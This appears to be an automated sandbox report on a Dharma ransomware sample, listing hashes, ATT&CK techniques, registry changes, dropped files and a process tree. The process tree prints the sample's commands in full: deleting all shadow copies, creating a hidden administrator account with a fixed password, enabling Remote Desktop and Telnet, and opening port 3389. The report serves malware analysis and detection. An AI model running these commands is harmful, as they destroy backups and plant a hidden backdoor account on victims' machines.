022728f678d8dcc6cba20147595ed4099e9c98be0582c0f67518d5664e3b8523

Resubmissions

03-03-2024 01:34

240303-by6ttsbe94 10

03-03-2024 01:31

240303-bxkj7sbe62 7

Analysis

max time kernel
142s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-03-2024 01:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/Dharma.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

evasion persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2756 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2748 attrib.exe

pid	process
2756	netsh.exe

pid	process
2748	attrib.exe

Sets service image path in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\gpbfixdszktgxlt\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\gpbfixdszktgxlt.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\pywggzozdbgdhwdry\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\pywggzozdbgdhwdry.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys"	mssql.exe

Executes dropped EXE 5 IoCs

Processes:

nc123.exemssql.exemssql2.exeSearchHost.exe

pid process

2804 nc123.exe
2604 mssql.exe
2500 mssql2.exe
1192
2372 SearchHost.exe

pid	process
2804	nc123.exe
2604	mssql.exe
2500	mssql2.exe
1192
2372	SearchHost.exe

Loads dropped DLL 13 IoCs

Processes:

Dharma.exe

pid	process
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe
2168	Dharma.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

SearchHost.exe

description ioc process

File opened (read-only) \??\D: SearchHost.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1920 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

744 vssadmin.exe
Runs net.exe
Suspicious behavior: LoadsDriver 4 IoCs

Processes:

mssql.exe

pid process

2604 mssql.exe
2604 mssql.exe
2604 mssql.exe
2604 mssql.exe

description	ioc	process
File opened (read-only)	\??\D:	SearchHost.exe

pid	process
1920	sc.exe

pid	process
744	vssadmin.exe

pid	process
2604	mssql.exe
2604	mssql.exe
2604	mssql.exe
2604	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mssql.exemssql2.exevssvc.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2604	mssql.exe
Token: SeLoadDriverPrivilege	2604	mssql.exe
Token: SeLoadDriverPrivilege	2604	mssql.exe
Token: SeLoadDriverPrivilege	2604	mssql.exe
Token: SeLoadDriverPrivilege	2604	mssql.exe
Token: SeDebugPrivilege	2500	mssql2.exe
Token: SeBackupPrivilege	2312	vssvc.exe
Token: SeRestorePrivilege	2312	vssvc.exe
Token: SeAuditPrivilege	2312	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	856	WMIC.exe
Token: SeSecurityPrivilege	856	WMIC.exe
Token: SeTakeOwnershipPrivilege	856	WMIC.exe
Token: SeLoadDriverPrivilege	856	WMIC.exe
Token: SeSystemProfilePrivilege	856	WMIC.exe
Token: SeSystemtimePrivilege	856	WMIC.exe
Token: SeProfSingleProcessPrivilege	856	WMIC.exe
Token: SeIncBasePriorityPrivilege	856	WMIC.exe
Token: SeCreatePagefilePrivilege	856	WMIC.exe
Token: SeBackupPrivilege	856	WMIC.exe
Token: SeRestorePrivilege	856	WMIC.exe
Token: SeShutdownPrivilege	856	WMIC.exe
Token: SeDebugPrivilege	856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	856	WMIC.exe
Token: SeRemoteShutdownPrivilege	856	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SearchHost.exe

pid process

2372 SearchHost.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

SearchHost.exe

pid process

2372 SearchHost.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

mssql.exemssql2.exeSearchHost.exe

pid process

2604 mssql.exe
2500 mssql2.exe
2372 SearchHost.exe
2604 mssql.exe

pid	process
2372	SearchHost.exe

pid	process
2372	SearchHost.exe

pid	process
2604	mssql.exe
2500	mssql2.exe
2372	SearchHost.exe
2604	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Dharma.execmd.execmd.execmd.exenc123.exenet.exenet.exe

description	pid	process	target process
PID 2168 wrote to memory of 2804	2168	Dharma.exe	nc123.exe
PID 2168 wrote to memory of 2804	2168	Dharma.exe	nc123.exe
PID 2168 wrote to memory of 2804	2168	Dharma.exe	nc123.exe
PID 2168 wrote to memory of 2804	2168	Dharma.exe	nc123.exe
PID 2168 wrote to memory of 2604	2168	Dharma.exe	mssql.exe
PID 2168 wrote to memory of 2604	2168	Dharma.exe	mssql.exe
PID 2168 wrote to memory of 2604	2168	Dharma.exe	mssql.exe
PID 2168 wrote to memory of 2604	2168	Dharma.exe	mssql.exe
PID 2168 wrote to memory of 2500	2168	Dharma.exe	mssql2.exe
PID 2168 wrote to memory of 2500	2168	Dharma.exe	mssql2.exe
PID 2168 wrote to memory of 2500	2168	Dharma.exe	mssql2.exe
PID 2168 wrote to memory of 2500	2168	Dharma.exe	mssql2.exe
PID 2168 wrote to memory of 2688	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2688	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2688	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2688	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2424	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2424	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2424	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2424	2168	Dharma.exe	cmd.exe
PID 2168 wrote to memory of 2372	2168	Dharma.exe	SearchHost.exe
PID 2168 wrote to memory of 2372	2168	Dharma.exe	SearchHost.exe
PID 2168 wrote to memory of 2372	2168	Dharma.exe	SearchHost.exe
PID 2168 wrote to memory of 2372	2168	Dharma.exe	SearchHost.exe
PID 2688 wrote to memory of 744	2688	cmd.exe	vssadmin.exe
PID 2688 wrote to memory of 744	2688	cmd.exe	vssadmin.exe
PID 2688 wrote to memory of 744	2688	cmd.exe	vssadmin.exe
PID 2688 wrote to memory of 744	2688	cmd.exe	vssadmin.exe
PID 2424 wrote to memory of 940	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 940	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 940	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 940	2424	cmd.exe	cmd.exe
PID 940 wrote to memory of 2340	940	cmd.exe	WMIC.exe
PID 940 wrote to memory of 2340	940	cmd.exe	WMIC.exe
PID 940 wrote to memory of 2340	940	cmd.exe	WMIC.exe
PID 940 wrote to memory of 2340	940	cmd.exe	WMIC.exe
PID 940 wrote to memory of 560	940	cmd.exe	find.exe
PID 940 wrote to memory of 560	940	cmd.exe	find.exe
PID 940 wrote to memory of 560	940	cmd.exe	find.exe
PID 940 wrote to memory of 560	940	cmd.exe	find.exe
PID 2804 wrote to memory of 1940	2804	nc123.exe	cmd.exe
PID 2804 wrote to memory of 1940	2804	nc123.exe	cmd.exe
PID 2804 wrote to memory of 1940	2804	nc123.exe	cmd.exe
PID 2804 wrote to memory of 1940	2804	nc123.exe	cmd.exe
PID 2424 wrote to memory of 1644	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1644	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1644	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1644	2424	cmd.exe	net.exe
PID 1644 wrote to memory of 532	1644	net.exe	net1.exe
PID 1644 wrote to memory of 532	1644	net.exe	net1.exe
PID 1644 wrote to memory of 532	1644	net.exe	net1.exe
PID 1644 wrote to memory of 532	1644	net.exe	net1.exe
PID 2424 wrote to memory of 1744	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1744	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1744	2424	cmd.exe	net.exe
PID 2424 wrote to memory of 1744	2424	cmd.exe	net.exe
PID 1744 wrote to memory of 800	1744	net.exe	net1.exe
PID 1744 wrote to memory of 800	1744	net.exe	net1.exe
PID 1744 wrote to memory of 800	1744	net.exe	net1.exe
PID 1744 wrote to memory of 800	1744	net.exe	net1.exe
PID 2424 wrote to memory of 1312	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 1312	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 1312	2424	cmd.exe	cmd.exe
PID 2424 wrote to memory of 1312	2424	cmd.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2748 attrib.exe

pid	process
2748	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2168

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"
2⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2604

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2500

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all
3⤵
- Interacts with shadow copies
PID:744

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
3⤵
- Suspicious use of WriteProcessMemory
PID:940

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:560

C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
3⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
4⤵
PID:532

C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
4⤵
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
3⤵
PID:1312

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:1672

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
3⤵
PID:2380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
4⤵
PID:748

C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
3⤵
PID:3044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
4⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
3⤵
PID:1904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
3⤵
PID:2284

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
3⤵
PID:2120

C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2748

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
3⤵
- Modifies Windows Firewall
PID:2756

C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
3⤵
- Launches sc.exe
PID:1920

C:\Windows\SysWOW64\net.exe
net start Telnet
3⤵
PID:2692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
4⤵
PID:1260

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2372

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\Everything.ini
Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
234KB

MD5
25d9de460523fa2852f3a2a0ec2eb138

SHA1
b86ca09560a03ebb32be0231ea2598b7f620f75b

SHA256
322b0b01772db324f0c0899d3e665eab8402afbf822bb40bd0b9977a77621c83

SHA512
d767754d1314013ef5850895d15a5db75a2baa042caf1a1202bc9d88935834024e10ddbfda8093855daa8a5cfdcdf746a557266177cd1c9151fc80144cafe50c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
184KB

MD5
b650f846b899c861827d735208bbafbd

SHA1
0203fde45a26dbe224bff41d0ce21305baf6bf1e

SHA256
ac38524d7476d032e78b863b44387e9e7bbd21111bbb65dcd68054ef16622759

SHA512
0bdf4b3df009af2b0f067ebd4c32396314086136e909000f24fe2ba89d88f77f7f59e3b19eac9a240b87cf538dfa426d25d98397362ae0c73f48de559115ed77

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat
Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\gpbfixdszktgxlt.sys
Filesize
526KB

MD5
53b78ff530fe539df3998770e507c361

SHA1
798a7260d6541a0c03b51a50d3f156a4b74533e0

SHA256
521f5439d18a5d1cd086088acde982e269908876d6319d8ed57f49028c2f187a

SHA512
a9d402904c396155282cfd216fa863bdf499244a6d611b1f0edb7ded5512bea528a8cf6c9bc559f31efac0aa80def1b8dc09bbac6804da5475493989c88c33c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
512KB

MD5
df1fc6d475dca6451632c1d9e71633a9

SHA1
f1528dd95236aff67f969ed6d817510853881aae

SHA256
f996c951ff3e8dfc6a11e375dd830dca3effb41c2516a2e5eceb4fded2295b5c

SHA512
cdfd985f6fe897f56a62d803ee1285a334745f023230efe1f259dfb7b8ed5e862a38f92e9bbfaa0d1fadf8847205c88ecbc153e61304d8f8443239739bdea17f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
192KB

MD5
9fc108ec1dcfa05fcf762d68d9b2e33a

SHA1
f755e3d0d21ab2f00bd1518a6b0284a86c382d16

SHA256
fe04591156056db8cb71e8a207c985ac6090e14110f280e9734069e4467fca27

SHA512
fdf1f61e02ad1df1a77dc6e71233a52284f63362f3a85ae275db2d58fbf95e19db8aa00a593e86a91c2003d35ea8c503e0e7869a699cb2dec979f76321c2bf92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
744KB

MD5
c115a0d95df410b08989efe42d4a3360

SHA1
4be846d01bea2bdcd4d2930c0da95389b12592ec

SHA256
39524c311a66f9ec6b52ca7e767b3e767855d45fd2716b8d22f84d4c37271bfc

SHA512
0a5d5372f721f7e6ddf199b8c0acea40b2075dc78a5e32cd79095ef362f181e32e52fe4a05a9711041f4751e3ab930488f296a6f9fd7773388d9f7b1ca0351ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
407KB

MD5
3a9ea3a7579811567cc5632df81a07e7

SHA1
2249186f9830f7bdf654dc06ee531f5f0ad611fe

SHA256
e988b70793abf2f91655384a2c68686ce75526f6034846657a4e234e5564e398

SHA512
baeed905f431b022405636a1cff08b69cf31a93406e777220822a4ada84f19ee56794a6701759481599df66dbcb87ac454bca6643a96b09dd7be6740e4938585

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
2.8MB

MD5
14def842deb9967660deff84d6130b1f

SHA1
3e5e5c2c025657505a7c135f10868642e5fbb053

SHA256
bc15721b8bafefdeaf9e540503f64f7cbabc111a1848633a0782c9253d7b6b23

SHA512
5ba4fcb58dbb44cc06e2f008cb70924404469b7774cb3d3e7dcaf0ca185010a6e9c8f322b0c743920aa470b85579e18ec9d7d58c2dbaeed632678d949da77400

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
766KB

MD5
ecc85cbf09c52a381ad435fc7570a714

SHA1
094d39a1f4d47d4f8b65bd6f549c828edaab6779

SHA256
2f12f4f7e2c526774995a86711e5ae7acf906676810df41dde3485c643253dbf

SHA512
2b48e2cd00a139bb42ac139a71e26350d1a47ce0050500e11982d37f42afac4a766833d63c6489ce98f7adf435921e088d851510eb74b2b51f949baa60ba32a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat
Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
575KB

MD5
644b6f26614239209fc7fb902424d840

SHA1
f6c005b2be968e324ed6a5af3c5ac03595ddaf0c

SHA256
a8a2f723d92f9c0e321e1fa0a54f0645cb8b8afba5f12cf03731958d16159ff7

SHA512
cd3d657cc76896c93b9c2f1f3f172ba39aaf70ecfa0be40001328797f9d6b2637ce9f6e86ede5262d40dbdef445bee1df9c222ce38ac558758ae8ffbc7481c5d

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
478KB

MD5
0db871a0029b01105cf78d6384de1ba8

SHA1
88b152ba2f2e2a95c83175da35698d35fd56fe03

SHA256
295dd40176856b1e717f69a285b867d9f77b063bd080a3881755f792fbbd81d3

SHA512
d912c011ce59e8541cf4067d6ceeafcfb65d1511c39388a1599e2baf399035cb94d6c47fa98a48441ae5625c31f8cc98d2a2d13ad90c2ee7f9a203045c726aa9

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
64KB

MD5
56c415cc529a8fede59a092b2b35a970

SHA1
4e4f6123dbd97e26961e4cd38079bc5704a4acf7

SHA256
d2151f342dbe2380a663d79158e2ae2a09c2144a8d7c4377fdf31a0cd802fba5

SHA512
400257109f5ed3b18e0aa4332d288614065d1179023fd51ec05950373c0a8c7ff9028a47e1215b7c4201eb24059e5fe8877a4eaed8c56b22ea334bbe454b1664

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
426KB

MD5
16eb35fe696451860e9e6f162b2bf94c

SHA1
d9f669e2e9e689d2003f442b2f6b545843589413

SHA256
fa2f0c7b9b014b655ccca89e7174a7839322271b2fc98caca0a341f731a76cb2

SHA512
cf290c2f6db4d909d9e7d36427a06a8e7585d92745286d70770feffa13fcada48bcc1a6b091d12353bd11d68c8e71fab5526209096d0860af854c109460cd240

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
320KB

MD5
d6e15491522a6c3d30cf7960cfc3386b

SHA1
4d0a3b305b6977197815b3ef3da38a7d04099cb8

SHA256
dbccd49197085cfe1cc497bec0f304c4a92b4911f5f9bfc24742fc3b76d3f9ab

SHA512
e305c8288b0a8a6686b513ad7e759fe1ecb724374deb4d67a3dd77efa6c0504ae80ca8cbe394e2a5ea80343bc9229f2848725bdc373254fe39217b6a40830da4

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
602KB

MD5
3c151a0c7274999089aa72a096719bf4

SHA1
5577825c09f24c8eeb78e63ab94a7ce7362af8fb

SHA256
14bd20de7003d3f2b770005a390ea1fd8096bd8fa729d09255857103872f5c8c

SHA512
2343068800734b84d1d44ab4cb03452024c48e8f3b45c9428021608e3c9d65b7a32c20aadeb678704ab104885b638c3ebf1b982abc3c112b1a0bda9fa0ef0788

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
1.8MB

MD5
a9bbe64b9154a6730e66ec2ebe5c8241

SHA1
9fb1a05dc1e01bf1a94c2dae42adf6c4a851e776

SHA256
c3eb5f9cceeb61bd9e305051a193e82db748709c0024fcbaca10dc374a190354

SHA512
59da33a142e9014c51c5615b78e02aa81ffd87db9d91ad1c6aa78b781907892e1b7152589821c183136dc0568e86a1a3dcc1ddd30bbafd6ac7ca84fc3695e43b

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
2.2MB

MD5
473f2599ca2de27ca8d250b2cd0b7139

SHA1
f392d073961bfddc0edbee1efbfba846731cce19

SHA256
711fd2775c3f5902fd894fc929f323ae5f7ec9d551b5b66df6626982e06a11db

SHA512
5c5a4093fb705b3d82aad25dd1f0ae791cd397b870d1de1627d7c733e46e72003d19fe44cf1637b9728bcc199f3298d2b8419c69b3d92cafd73e5c21b11242c6

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
